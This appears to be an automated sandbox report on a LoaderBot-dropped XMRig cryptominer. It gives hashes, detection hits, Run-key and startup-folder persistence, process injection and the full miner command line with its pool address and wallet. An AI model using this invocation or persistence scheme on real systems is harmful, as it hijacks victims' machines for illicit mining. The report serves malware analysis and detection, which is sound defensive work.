Analysis
-
max time kernel
48s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
27-05-2023 08:56
Behavioral task
behavioral1
Sample
01904399.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
01904399.exe
Resource
win10v2004-20230220-en
General
-
Target
01904399.exe
-
Size
4.0MB
-
MD5
33b4baef7b0a6ad57a7d30af324c4efd
-
SHA1
b169a559615a8448d7ed7da56d36a6850d2092e2
-
SHA256
3a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
-
SHA512
739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
SSDEEP
49152:ENDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:SzP88fBsnZTgOtqB3m1RC3
Malware Config
Signatures
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/1808-133-0x00000000005D0000-0x00000000009CE000-memory.dmp loaderbot -
XMRig Miner payload 17 IoCs
resource yara_rule behavioral2/memory/2736-150-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-153-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-156-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-157-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-158-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-161-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-164-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-165-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-166-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-167-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-168-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-169-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-170-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-171-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-172-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-173-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4236-174-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation 01904399.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 01904399.exe -
Executes dropped EXE 2 IoCs
pid Process 2736 Driver.exe 4236 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\01904399.exe" 01904399.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4972 2736 WerFault.exe 79 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe 1808 01904399.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1808 01904399.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1808 01904399.exe Token: SeLockMemoryPrivilege 2736 Driver.exe Token: SeLockMemoryPrivilege 2736 Driver.exe Token: SeLockMemoryPrivilege 4236 Driver.exe Token: SeLockMemoryPrivilege 4236 Driver.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1808 wrote to memory of 2736 1808 01904399.exe 79 PID 1808 wrote to memory of 2736 1808 01904399.exe 79 PID 1808 wrote to memory of 4236 1808 01904399.exe 84 PID 1808 wrote to memory of 4236 1808 01904399.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\01904399.exe"C:\Users\Admin\AppData\Local\Temp\01904399.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2736 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2736 -s 7603⤵
- Program crash
PID:4972
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 412 -p 2736 -ip 27361⤵PID:4260
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322